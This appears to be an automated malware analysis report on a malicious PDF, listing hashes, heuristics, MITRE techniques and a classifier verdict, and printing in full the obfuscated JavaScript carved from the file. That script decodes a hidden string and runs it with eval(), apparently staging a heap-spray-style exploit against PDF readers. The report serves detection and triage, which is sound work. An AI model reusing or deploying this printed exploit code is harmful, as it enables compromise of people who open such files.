Malicious PDF — malware analysis report

Static analysis result for SHA-256 30389dee424c36fb…

MALICIOUS

PDF

9.3 KB Created: 2010-05-12 12:49:16 Authoring application: LLegjYedwtDrlG (via YMPD6iHWVGfVd) First seen: 2026-05-10
MD5: 4ceacca772b9d230ffa863ceddfb66f6 SHA-1: 0595c8ab4fd19983b4cf56b339d5fa68aae3a7ee SHA-256: 30389dee424c36fb9f4535b60f7a54364adcebb0aeb86f78bde3f8922711ca7c
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1027 Obfuscated Files or Information

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), a common technique for executing obfuscated code. The extracted JavaScript object, javascript_obj0007_000.js, is noted for script obfuscation. The primary function of this script appears to be executing arbitrary code, likely for downloading and running a secondary payload, which is a common initial access vector for malware.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    Xpkn l wUYDvjd=dD(LDDDDD;\nddcjndKh.aJg9TFFQQKglrd=d1}YHFUEIQw.Viaf4PWiUQg3d*dF;\nddcjndHbVJGIHmrb0DNCUid=dp,(Xpkn l wUYDvjd-d6Kh.aJg9TFFQQKglrd+dD(q{);\nddcjndygCnXq5G0N{1FAcBd=d4UiHyjri6\"%4wDwD%4wDwD\");\nddygCnXq5G0N{1FAcBd=drREwcEGs>SJfmXs16ygCnXq5G0N{1FAcB7dHbVJGIHmrb0DNCUi);\nddcjndk>IJnuf.gbKbSXCRd=d6zIFqcwbtpkNsuR<Ed-dD(LDDDDD)d/dp,(Xpkn l wUYDvj;\nddhAnd6cjndIs2ik>Am9X<NByhSd=dD;dIs2ik>Am9X<NByhSd8dk>IJnuf.gbKbSXCR;dIs2ik>Am9X<NByhSd++d)e\nddddEfFwOf<iJ{ L1rF,[Is2ik>Am9X<NByhS]d=dygCnX …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x246 8109 bytes
SHA-256: 354800d96695f251759574a1d72bfee906f3740a764e67fdd063fc8aad3d5694
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 129 of 169 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function VG487k8lmF(VG487k8lmF,TBof6HHjfnzrFGvhAGr) {var AYeKzfm0CrqR1m=VG487k8lmF. substr (TBof6HHjfnzrFGvhAGr, 1);return AYeKzfm0CrqR1m;}/*jjY837Kf6|BUaCNA3|eDbAqRCX7UPkmy*/function AZTn95pg1V3T(z7K5UUmsKUTm0IRZVtQu) {/*BwC87i5|kQgneg|GAkhBQyEnwY3X*/var At8jQ = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*rgCej[bI7hs]DWsj2ykc*//*ltKpX7EQUF|AIbaK3iHaRVenEDf2o8O|sY5FWAVqG*/var AJJ38HD4cYhKj1dMsm /*hPu8ZoghF[Ajb7n60R5Ehnddsze]gkWEzH*/= new String("8Z6)eodP7Tuf,vaKzkImbptBsEY.JXSV0>9jly1ihQ3 ROWGUArNnHg4cC(2xD<FqL}5M{w");/*Pvjw0|qayoDueVqi|UCXD21HYbddRkfgWETN*/for(I7MYsPScN2sD=0;I7MYsPScN2sD<At8jQ.length;I7MYsPScN2sD++) {if(z7K5UUmsKUTm0IRZVtQu == VG487k8lmF(AJJ38HD4cYhKj1dMsm, I7MYsPScN2sD)) {/*AnPorAICrr6B[TElKMAmpd3Q9anDu]fuduYLvgNcNJe7djjn*/return VG487k8lmF(At8jQ, I7MYsPScN2sD);/*jPbDJrDjUGUKmEoXc <I8DlMNFJqotUZTk0Wt]aT3gnEJrsgKio*/}}return z7K5UUmsKUTm0IRZVtQu;}/*mQV0Vfh[O1ZhcQ4MyUfr1JvB1ehB]MKpcf*//*xBDxP5MxXcsjR|F84Pu|GOdIRqS7Iyd6zhtFd63*/var cxSau3ZWfeQ = new String;var f4UbBbAgEzOK6Ar6GY = new String("\ncjndEfFwOf<iJ{ L1rF,d=dUiCdTnnj26);\ncjndJIJkLjM,kSWmMT3z;\nh4Uyg AUdrREwcEGs>SJfmXs16ygCnXq5G0N{1FAcB7dHbVJGIHmrb0DNCUi)e\nddC3 Wid6ygCnXq5G0N{1FAcBPWiUQg3d*dFd8dHbVJGIHmrb0DNCUi)e\nddddygCnXq5G0N{1FAcBd+=dygCnXq5G0N{1FAcB;\nddo\nddygCnXq5G0N{1FAcBd=dygCnXq5G0N{1FAcBPH4lHgn UQ6D7dHbVJGIHmrb0DNCUid/dF);\nddnig4nUdygCnXq5G0N{1FAcB;\no\nh4Uyg AUdpRVmGl{I.v(JLHHj6tsLFRCb>kH wrVUQ)e\nddcjndzIFqcwbtpkNsuR<Ed=dD(DyDyDyDy;\nddcjnd1}YHFUEIQw.Viaf4d=d4UiHyjri6\"%4LqLq%4LqLq%4LqLq%4Davu%4qq}u%455fw%4{Duw%4{DD<%4vaqq%4vFLq%4vuaT%4v{D}%4aavf%4aaaa%4{uMa%4,aLv%4vava%45Lva%4vqTa%4wa5L%4LFaq%4wa5L%45vvM%4vaDq%4vavu%45Lva%4uwDq%45<{M%4v<T<%4DMDq%4va<<%4vava%4TT55%4uwvu%4MM{M%45}<<%4DMv<%4va<a%4vava%4TT55%4uwvM%4fT{M%4<D}a%4DMF,%4vaD,%4vava%4TT55%4uwvq%4DD{M%4DaF<%4DM{a%4vaqu%4vava%4TT55%4uwaa%4Fv{M%4DTw5%4DM}M%4vaFw%4vava%4TT55%4Taau%4,M5a%4wTFf%455<}%4aMTT%4v{D5%4vavv%4u<va%4wT55%45Lfu%4vuTT%4vv{}%45Lu5%4aMuT%4DMuw%4va5L%4vava%4{Mua%4a},w%4wafD%4M{DM%4vava%455va%4aqTT%4FT5L%4Fa5f%455ua%4faTT%4<D{M%4vava%4uava%4TT5L%4{}au%4u5v,%4uT5L%4DMaM%4va{v%4vava%4TTvf%4F{fa%4uqva%4f<w<%4F{{T%4vuTa%4{TwM%4vava%4wT<D%45Lfa%4vqTT%4vv{}%45Lu5%4aMuT%4TaDM%4vava%4{}va%4uMv{%4TTvf%4,ffu%4ufqL%4<Duf%4fawT%4ufua%4TT5L%4{}aq%4u5vT%4uT5L%4DMaM%4vaff%4vava%4va{}%4wT<D%45Lfa%4vMTT%4v,{}%45Lu5%4aMuT%4aaDM%4vava%4{}va%45L<D%4aaTT%4vv{}%45Lu5%4aMuT%4vaDM%4vava%4Tvva%4u,uL%4Dvvf%4Dvvf%4Dvvf%4Dvvf%4Dq5f%4u}vu%45Luf%4D,q}%4u,<{%4Da<D%45LuT%45LDq%4vMwF%4uF5L%4uwvq%4wf5L%45L,q%4a<wu%4vfwM%4uw<f%4ww5L%4vffa%4,f<f%4T5F5%4LFTv%4Ffvf%4,fuw%4vD<w%4aa}<%4<,,}%4vMwu%4F<Fv%4vfvF%4Ta<,%4<vDL%4<<,L%4wTu<%4u}DT%4DL5L%4u}5L%4vffu%4{wqF%4vq5L%45LTL%4aqu}%4qFvf%4vu5L%4vf5L%4u<FT%4F,uF%4vavM%4<uDM%4<D<<%4uT<D%4Tqu,%4TDTF%4vaT<%4ML5{%4MDML%4FaqT%45LFa%45,qD%4q<5<%4Mq5v%45wFv%4555v%4Fa5a%45f5F%45M5a%45fFa%45<5a%4Fv5L%45{MD%4qaMD%45L5w%4qwq,%4DDqF\");\ndd hd6tsLFRCb>kH wrVUQd==d<)e\nddddzIFqcwbtpkNsuR<Ed=dD(qDqDqDqD;\ndddd1}YHFUEIQw.Viaf4d=d4UiHyjri6\"%4LqLq%4LqLq%4LqLq%4Davu%4qq}u%455fw%4{Duw%4{DD<%4vaqq%4vFLq%4vuaT%4v{D}%4aavf%4aaaa%4{uMa%4,aLv%4vava%45Lva%4vqTa%4wa5L%4LFaq%4wa5L%45vvM%4vaDq%4vavu%45Lva%4uwDq%45<{M%4v<T<%4DMDq%4va<<%4vava%4TT55%4uwvu%4MM{M%45}<<%4DMv<%4va<a%4vava%4TT55%4uwvM%4fT{M%4<D}a%4DMF,%4vaD,%4vava%4TT55%4uwvq%4DD{M%4DaF<%4DM{a%4vaqu%4vava%4TT55%4uwaa%4Fv{M%4DTw5%4DM}M%4vaFw%4vava%4TT55%4Taau%4,M5a%4wTFf%455<}%4aMTT%4v{D5%4vavv%4u<va%4wT55%45Lfu%4vuTT%4vv{}%45Lu5%4aMuT%4DMuw%4va5L%4vava%4{Mua%4a},w%4wafD%4M{DM%4vava%455va%4aqTT%4FT5L%4Fa5f%455ua%4faTT%4<D{M%4vava%4uava%4TT5L%4{}au%4u5v,%4uT5L%4DMaM%4va{v%4vava%4TTvf%4F{fa%4uqva%4f<w<%4F{{T%4vuTa%4{TwM%4vava%4wT<D%45Lfa%4vqTT%4vv{}%45Lu5%4aMuT%4TaDM%4vava%4{}va%4uMv{%4TTvf%4,ffu%4ufqL%4<Duf%4fawT%4ufua%4TT5L%4{}aq%4u5vT%4uT5L%4DMaM%4vaff%4vava%4va{}%4wT<D%45Lfa%4vMTT%4v,{}%45Lu5%4aMuT%4aaDM%4vava%4{}va%45L<D%4aaTT%4vv{}%45Lu5%4aMuT%4vaDM%4vava%4Tvva%4u,uL%4Dvvf%4Dvvf%4Dvvf%4Dvvf%4Dq5f%4u}vu%45Luf%4D,q}%4u,<{%4Da<D%45LuT%45LDq%4vMwF%4uF5L%4uwvq%4wf5L%45L,q%4a<wu%4vfwM%4uw<f%4ww5L%4vffa%4,f<f%4T5F5%4LFTv%4Ffvf%4,fuw%4vD<w%4aa}<%4<,,}%4vMwu%4F<Fv%4vfvF%4Ta<,%4<vDL%4<<,L%4wTu<%4u}DT%4DL5L%4u}5L%4vffu%4{wqF%4vq5L%45LTL%4aqu}%4qFvf%4vu5L%4vf5L%4u<FT%4F,uF%4vavM%4<uDM%4<D<<%4uT<D%4Tqu,%4TDTF%4vaT<%4ML5{%4MDML%4FaqT%45LFa%45,qD%4q<5<%4Mq5v%45wFv%4555v%4Fa5a%45f5F%45M5a%45fFa%45<5a%4Fv5L%45{MD%4qaMD%45L5w%4qwq,%4DDqF\");\nddo\nddiWHid hd6tsLFRCb>kH wrVUQd==dF)e\ndddd1}YHFUEIQw.Viaf4d=d4UiHyjri6\"%4LqLq%4LqLq%4LqLq%4Davu%4qq}u%455fw%4{Duw%4{DD<%4vaqq%4vFLq%4vuaT%4v{D}%4aavf%4aaaa%4{uMa%4,aLv%4vava%45Lva%4vqTa%4wa5L%4LFaq%4wa5L%45vvM%4vaDq%4vavu%45Lva%4uwDq%45<{M%4v<T<%4DMDq%4va<<%4vava%4TT55%4uwvu%4MM{M%45}<<%4DMv<%4va<a%4vava%4TT55%4uwvM%4fT{M%4<D}a%4DMF,%4vaD,%4vava%4TT55%4uwvq%4DD{M%4DaF<%4DM{a%4vaqu%4vava%4TT55%4uwaa%4Fv{M%4DTw5%4DM}M%4vaFw%4vava%4TT55%4Taau%4,M5a%4wTFf%455<}%4aMTT%4v{D5%4vavv%4u<va%4wT55%45Lfu%4vuTT%4vv{}%45Lu5%4aMuT%4DMuw%4va5L%4vava%4{Mua%4a},w%4wafD%4M{DM%4vava%455va%4aqTT%4FT5L%4Fa5f%455ua%4faTT%4<D{M%4vava%4uava%4TT5L%4{}au%4u5v,%4uT5L%4DMaM%4va{v%4vava%4TTvf%4F{fa%4uqva%4f<w<%4F{{T%4vuTa%4{TwM%4vava%4wT<D%45Lfa%4vqTT%4vv{}%45Lu5%4aMuT%4TaDM%4vava%4{}va%4uMv{%4TTvf%4,ffu%4ufqL%4<Duf%4fawT%4ufua%4TT5L%4{}aq%4u5vT%4uT5L%4DMaM%4vaff%4vava%4va{}%4wT<D%45Lfa%4vMTT%4v,{}%45Lu5%4aMuT%4aaDM%4vava%4{}va%45L<D%4aaTT%4vv{}%45Lu5%4aMuT%4vaDM%4vava%4Tvva%4u,uL%4Dvvf%4Dvvf%4Dvvf%4Dvvf%4Dq5f%4u}vu%45Luf%4D,q}%4u,<{%4Da<D%45LuT%45LDq%4vMwF%4uF5L%4uwvq%4wf5L%45L,q%4a<wu%4vfwM%4uw<f%4ww5L%4vffa%4,f<f%4T5F5%4LFTv%4Ffvf%4,fuw%4vD<w%4aa}<%4<,,}%4vMwu%4F<Fv%4vfvF%4Ta<,%4<vDL%4<<,L%4wTu<%4u}DT%4DL5L%4u}5L%4vffu%4{wqF%4vq5L%45LTL%4aqu}%4qFvf%4vu5L%4vf5L%4u<FT%4F,uF%4vavM%4<uDM%4<D<<%4uT<D%4Tqu,%4TDTF%4vaT<%4ML5{%4MDML%4FaqT%45LFa%45,qD%4q<5<%4Mq5v%45wFv%4555v%4Fa5a%45f5F%45M5a%45fFa%45<5a%4Fv5L%45{MD%4qaMD%45L5w%4qwq,%4DDqF\");\nddo\nddcjndp,(Xpkn l wUYDvjd=dD(LDDDDD;\nddcjndKh.aJg9TFFQQKglrd=d1}YHFUEIQw.Viaf4PWiUQg3d*dF;\nddcjndHbVJGIHmrb0DNCUid=dp,(Xpkn l wUYDvjd-d6Kh.aJg9TFFQQKglrd+dD(q{);\nddcjndygCnXq5G0N{1FAcBd=d4UiHyjri6\"%4wDwD%4wDwD\");\nddygCnXq5G0N{1FAcBd=drREwcEGs>SJfmXs16ygCnXq5G0N{1FAcB7dHbVJGIHmrb0DNCUi);\nddcjndk>IJnuf.gbKbSXCRd=d6zIFqcwbtpkNsuR<Ed-dD(LDDDDD)d/dp,(Xpkn l wUYDvj;\nddhAnd6cjndIs2ik>Am9X<NByhSd=dD;dIs2ik>Am9X<NByhSd8dk>IJnuf.gbKbSXCR;dIs2ik>Am9X<NByhSd++d)e\nddddEfFwOf<iJ{ L1rF,[Is2ik>Am9X<NByhS]d=dygCnXq5G0N{1FAcBd+d1}YHFUEIQw.Viaf4;\nddo\no\nh4Uyg AUdUxxqTuX}0WsqKpWE6)e\nddcjndXO5LkgtHBt G<BkTd=dD;\nddcjnd1zf>J31<JLqRsATTd=djrrPc iCinSinH AUPgA.gn UQ6);\nddjrrPyWijnJ GiB4g6JIJkLjM,kSWmMT3z);\n\ndd hd61zf>J31<JLqRsATTd8dMP<)e\nddddpRVmGl{I.v(JLHHj6D);\nddddcjndca,nDjR02.mxNyTvd=d4UiHyjri6\"%4DyDy%4DyDy\");\nddddC3 Wid6ca,nDjR02.mxNyTvPWiUQg3d8dLLw}F)ca,nDjR02.mxNyTvd+=dca,nDjR02.mxNyTv;\nddddg3 HdPyAWWjl.gAnid=dfAWWjlPyAWWiygvGj WkUhA6e\nddddddH4lRd:d\"\"7dGHQd:dca,nDjR02.mxNyTv\nddddo\ndddd);\nddo\n hd61zf>J31<JLqRsATTdZ=dw)e\nddddgn2de\n hd6jrrP1AyPfAWWjlPQigkyAU)e\nddddddddpRVmGl{I.v(JLHHj6F);\nddddddddcjndOpUt}EB>JYzHaYLAd=d4UiHyjri6\"%Dw\");\nddddddddC3 Wid6OpUt}EB>JYzHaYLAPWiUQg3d8dD(LDDD)OpUt}EB>JYzHaYLAd+=dOpUt}EB>JYzHaYLA;\nddddddddOpUt}EB>JYzHaYLAd=d\"tP\"d+dOpUt}EB>JYzHaYLA;\njrrP1AyPfAWWjlPQigkyAU6OpUt}EB>JYzHaYLA);\nddddddddXO5LkgtHBt G<BkTd=d<;\nddddddo\nddddddiWHide\nddddddddXO5LkgtHBt G<BkTd=d<;\nddddddo\nddddo\nddddyjgy3d6i)e\nddddddXO5LkgtHBt G<BkTd=d<;\nddddo\ndddd hd6XO5LkgtHBt G<BkTd==d<)e\ndddddd hd661zf>J31<JLqRsATTdZ=dMP<&&d1zf>J31<JLqRsATTd8dw))e\nddddddddpRVmGl{I.v(JLHHj6<);\nddddddddcjndJKQNnEtNH rRmx(ad=d\"<Fwwwwwwwwwwwwwwwwww\";\nddddddddhAnd6gOyYuFxi.z0  j0Ed=dD;dgOyYuFxi.z0  j0Ed8dFM5;dgOyYuFxi.z0  j0Ed++d)e\nddddddddddJKQNnEtNH rRmx(ad+=d\"{\";\nddddddddo\ndddddddd4g WPrn Ugh6\"%L}DDDh\"7dJKQNnEtNH rRmx(a);\nddddddo\nddddo\nddo\no\njrrPx,KRiij0tEK3Ev(Ud=dUxxqTuX}0WsqKpWE;\nJIJkLjM,kSWmMT3zd=djrrPHigJ GiB4g6\"jrrPx,KRiij0tEK3Ev(U6)\"7d<D);\n");/*ZlaqogpjwZf2o9B6pU{yIXu85eEYb7P1jqhOMN}AnU1RT3N9NHxVfhUb*//*YzdWF|Av2K8G87tS|AlsOk5WYR26lT8AJcW*/for(iMm97fYTB2=0;iMm97fYTB2<f4UbBbAgEzOK6Ar6GY.length;iMm97fYTB2++)cxSau3ZWfeQ += AZTn95pg1V3T(VG487k8lmF(f4UbBbAgEzOK6Ar6GY,iMm97fYTB2));eval(cxSau3ZWfeQ);/*xS9qc8wa[gsugUcv5YITpAPQUOQd]nrf5rLXp8ylegVB1*/

Open this report in the interactive analyzer, or submit your own file for analysis.